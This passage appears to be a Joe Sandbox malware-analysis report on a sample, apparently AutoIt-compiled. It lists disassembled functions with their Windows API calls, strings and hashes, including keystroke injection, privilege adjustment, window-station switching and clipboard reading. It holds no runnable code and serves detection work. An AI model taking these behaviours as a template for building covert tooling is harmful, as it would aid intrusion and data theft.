APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00BC5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00BC5D76

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 885adb16b84a30ba86a682ad2c458105fbcb885f1e4a00a7badc1a881dbecc2c
Instruction ID: 1e5a5655563d57f33de8dff4b3d0063196d6abd71ddf28ade44272aad5ac2aa8
Opcode Fuzzy Hash: 885adb16b84a30ba86a682ad2c458105fbcb885f1e4a00a7badc1a881dbecc2c
Instruction Fuzzy Hash: DC112571200B059FD3308F15C888F66B7E9EB45760F14896EE4AB86A50DBB0F985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BE4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00BE4AD6

Part of subcall function 00BE8D68: __getptd_noexit.LIBCMT ref: 00BE8D68

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 0bec7a948c6adedaabcbb8626736760fb8438f25dea0114a1943ec4b88f4442d
Instruction ID: 1b2a8e16affe4d0ce67eb943371ec3fec9c3eb6580c5ef4baefd190d31a87862
Opcode Fuzzy Hash: 0bec7a948c6adedaabcbb8626736760fb8438f25dea0114a1943ec4b88f4442d
Instruction Fuzzy Hash: 0CF0AF31940689ABDF61AF768C0639F36E1AF00335F0485A4F828AA1E1DB788A50DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00C862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4FDE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 07ea8dc43f7e0e73202d6777fd8fb9d5afd6624c15e8783e77e9253886092ccf
Instruction ID: 2f0cf61411a4d2579efbbfe478dd3cf3091c07a9f27d1103476bea04f6fb0aa4
Opcode Fuzzy Hash: 07ea8dc43f7e0e73202d6777fd8fb9d5afd6624c15e8783e77e9253886092ccf
Instruction Fuzzy Hash: C7F03971105752CFCB349F64E4A4E16BBF1FF143293208ABEE5DA82610C771A940DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00BE09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BE09F4

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 5cd0a2c8ee2ea902d045f94f4bc056901948087cecc269b6181164e4ca44b781
Instruction ID: 77e1983583678ad7deb749cc8e0ac922000f5d93e55376adcde60ae403f5a2ee
Opcode Fuzzy Hash: 5cd0a2c8ee2ea902d045f94f4bc056901948087cecc269b6181164e4ca44b781
Instruction Fuzzy Hash: 97E086769452289BC720D6589C05FFA77EDDF89791F0401F5FD0CD7205D9A19C818690

Uniqueness

Uniqueness Score: -1.00%

Function 00C29129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C2914B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 8d8df4810b0ca823219980de82e33a3a404c37ba103300bcceee7cbdc8212510
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 9EE09AB0204B409FDB388A24E810BE373E0EB06319F00085CF2AA83342EB62B8418B59

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00BFE16B,?,?,00000000), ref: 00BC5DBF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2d8aa294803dd27708c4772a4386e906ff6898dabf5be5d57c8e6869ea52f6cb
Instruction ID: 400ab9e8737239ebeab0a78d9129941bb9cee8095aac56215f7a58bd00c1b968
Opcode Fuzzy Hash: 2d8aa294803dd27708c4772a4386e906ff6898dabf5be5d57c8e6869ea52f6cb
Instruction Fuzzy Hash: 70D0C77464020CBFEB10DB80DC46FAD777CE705710F100194FD0456290D6B27D508795

Uniqueness

Uniqueness Score: -1.00%

Function 00BE548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00BE5496

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 4a76bdd80add76a7101a6dba834a52221f92c189ce673e6e2ba5b7e2e5d00a86
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 5FB0927684020C77DE122E83EC02A593B699B40678F808060FB0C182A2A673A6A09689

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00C2D46A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0f874425bccbbcf6aa2104a4df61973a156b093d3248bc3fca30ae869a0b8de6
Instruction ID: ce9531df7a25ea2bf802666a463397f38aa5331b5ec4d4ed8609a74cb67f7f21
Opcode Fuzzy Hash: 0f874425bccbbcf6aa2104a4df61973a156b093d3248bc3fca30ae869a0b8de6
Instruction Fuzzy Hash: F07172342083128FC714EF25D491F6AB7E0AF98314F0449ADF4968B6A2DF70EE49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BE0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00BE0EF7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 1dc22558c0445083fb072bb67a8e46e0446075bebc097558c67c0fabaab7b6e4
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1E31DF70A10186DBC718EE5AD480969F7E6FB59300B688AE5E40ACB651DBB0EDC1DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 038D2300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 038D2311

Memory Dump Source

Source File: 00000000.00000002.1448279966.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38d0000_150-425-2024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 28422ef3ce76a52e831e9a11c399e11a0320f690a906f47181e445bbfe68ec9a
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 23E0E67498010DDFDB00EFF8D54969E7FB4EF04301F1005A1FD01D2280D6309D508A72

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C4CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C4CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C4CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C4CF00
SendMessageW.USER32 ref: 00C4CF29
_wcsncpy.LIBCMT ref: 00C4CFA1
GetKeyState.USER32(00000011), ref: 00C4CFC2
GetKeyState.USER32(00000009), ref: 00C4CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4CFE5
GetKeyState.USER32(00000010), ref: 00C4CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C4D018
SendMessageW.USER32 ref: 00C4D03F
SendMessageW.USER32(?,00001030,?,00C4B602), ref: 00C4D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C4D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C4D16E
SetCapture.USER32(?), ref: 00C4D177
ClientToScreen.USER32(?,?), ref: 00C4D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C4D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C4D203
ReleaseCapture.USER32 ref: 00C4D20E
GetCursorPos.USER32(?), ref: 00C4D248
ScreenToClient.USER32(?,?), ref: 00C4D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C4D2B1
SendMessageW.USER32 ref: 00C4D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C4D31C
SendMessageW.USER32 ref: 00C4D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C4D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C4D37B
GetCursorPos.USER32(?), ref: 00C4D39B
ScreenToClient.USER32(?,?), ref: 00C4D3A8
GetParent.USER32(?), ref: 00C4D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C4D431
SendMessageW.USER32 ref: 00C4D462
ClientToScreen.USER32(?,?), ref: 00C4D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C4D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C4D51A
SendMessageW.USER32 ref: 00C4D53D
ClientToScreen.USER32(?,?), ref: 00C4D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C4D5C3

Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC

GetWindowLongW.USER32(?,000000F0), ref: 00C4D65F

Strings

F, xrefs: 00C4D543
@GUI_DRAGID, xrefs: 00C4D1AA
@U=u, xrefs: 00C4CE91, 00C4CF00, 00C4CF29, 00C4CFE5, 00C4D018, 00C4D03F, 00C4D145, 00C4D2B1, 00C4D2DF, 00C4D31C, 00C4D34B, 00C4D431, 00C4D462, 00C4D51A, 00C4D53D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$@U=u$F
API String ID: 3977979337-1007936534
Opcode ID: 0e5986518e81bb235c47269b49ebd35ae74520323248a7636e26d1ea358d132c
Instruction ID: 1df8bbd2698ac25c3a8160576ba1c0f4c3302586bbb25b5206081d99b2eac25e
Opcode Fuzzy Hash: 0e5986518e81bb235c47269b49ebd35ae74520323248a7636e26d1ea358d132c
Instruction Fuzzy Hash: CE42BC74205240AFDB25DF28C888FAABBE5FF49314F14052DF6AA872B1C731D941CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00C4804A Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00C4873F

Strings

%d/%02d/%02d, xrefs: 00C48478
@U=u, xrefs: 00C480E0, 00C48134, 00C481E7, 00C4822E, 00C48256, 00C483BB, 00C48456, 00C484A0, 00C484EA, 00C4850A, 00C485EC, 00C48625, 00C48676, 00C486E1, 00C4873F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d$@U=u
API String ID: 3850602802-2764005415
Opcode ID: a5051fbc88f0c5a35ced8ec9bf8cc5e0851583d51fc101a04c9eefcdb57148d7
Instruction ID: 7af5dabbdb22e0dcf651b226cb1c376eea453b67dc84919c81a06e0c4dd36760
Opcode Fuzzy Hash: a5051fbc88f0c5a35ced8ec9bf8cc5e0851583d51fc101a04c9eefcdb57148d7
Instruction Fuzzy Hash: AF12C171500248ABEB259F25CC49FAE7BF8FF46750F204169F925EA2E1DF708A49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BD710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BD75C2
_memset.LIBCMT ref: 00BD76B1
_memmove.LIBCMT ref: 00BD7C4B
_memmove.LIBCMT ref: 00BD7E4F

Strings

[:>:]], xrefs: 00BD760A
\b(?=\w), xrefs: 00C13C34
[:<:]], xrefs: 00BD75F1
Q\E, xrefs: 00BD81C1
DEFINE, xrefs: 00C125AF
\b(?<=\w), xrefs: 00C13C41

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 8924d95cf6a8b32778fd3377c66a916f438d412d9cb402989ce1344ba214c1d1
Instruction ID: 4f1303f270342b14d8584ad6adf819aa0202ad019f8286be01abfa86fa657ee4
Opcode Fuzzy Hash: 8924d95cf6a8b32778fd3377c66a916f438d412d9cb402989ce1344ba214c1d1
Instruction Fuzzy Hash: 9B938E75A002199BDB24CF98C881BEDB7F1FF49714F2581AAE955AB380E7709EC1DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00BC4A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BFDA8E
IsIconic.USER32(?), ref: 00BFDA97
ShowWindow.USER32(?,00000009), ref: 00BFDAA4
SetForegroundWindow.USER32(?), ref: 00BFDAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFDAC4
GetCurrentThreadId.KERNEL32 ref: 00BFDACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BFDAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFDAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFDAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00BFDAF8
SetForegroundWindow.USER32(?), ref: 00BFDAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFDB10
keybd_event.USER32(00000012,00000000), ref: 00BFDB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFDB25
keybd_event.USER32(00000012,00000000), ref: 00BFDB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFDB33
keybd_event.USER32(00000012,00000000), ref: 00BFDB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFDB42
keybd_event.USER32(00000012,00000000), ref: 00BFDB47
SetForegroundWindow.USER32(?), ref: 00BFDB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00BFDB71

Strings

Shell_TrayWnd, xrefs: 00BFDA89

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 0baacfaa8f41eb0017464911309c114f5a9da86a0c512aef1a754350f74ee1be
Instruction ID: b13b06387b3bd17c2ec41906cd738e1f8fd1dc16fe1895f4ae467a28b0467d4e
Opcode Fuzzy Hash: 0baacfaa8f41eb0017464911309c114f5a9da86a0c512aef1a754350f74ee1be
Instruction Fuzzy Hash: EC317375A4031CBBEB216F619C49F7F3EADEB45B50F114069FB04E71D1C6B05901AAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C18858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00C18CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C18D0D
Part of subcall function 00C18CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C18D3A
Part of subcall function 00C18CC3: GetLastError.KERNEL32 ref: 00C18D47

_memset.LIBCMT ref: 00C1889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C188ED
CloseHandle.KERNEL32(?), ref: 00C188FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C18915
GetProcessWindowStation.USER32 ref: 00C1892E
SetProcessWindowStation.USER32(00000000), ref: 00C18938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C18952

Part of subcall function 00C18713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C18851), ref: 00C18728
Part of subcall function 00C18713: CloseHandle.KERNEL32(?,?,00C18851), ref: 00C1873A

Strings

winsta0, xrefs: 00C18910
, xrefs: 00C188AA
default, xrefs: 00C1894D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: ca9704e719f270a36d9714d728a7064f9a9221b3991e4b01e4f9a1ae8883aa7d
Instruction ID: ae9bcacbd12743502655b045ae8d1e87f2939b0e307f7f1e602ffe5d265a73b4
Opcode Fuzzy Hash: ca9704e719f270a36d9714d728a7064f9a9221b3991e4b01e4f9a1ae8883aa7d
Instruction Fuzzy Hash: AD816C75904209AFDF11DFA4DC45AEE7BB8FF06305F08416AF920A6161DB318E99FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C3425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C4F910), ref: 00C34284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C34292
GetClipboardData.USER32(0000000D), ref: 00C3429A
CloseClipboard.USER32 ref: 00C342A6
GlobalLock.KERNEL32(00000000), ref: 00C342C2
CloseClipboard.USER32 ref: 00C342CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C342E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00C342EE
GetClipboardData.USER32(00000001), ref: 00C342F6
GlobalLock.KERNEL32(00000000), ref: 00C34303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00C34337
CloseClipboard.USER32 ref: 00C34447

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
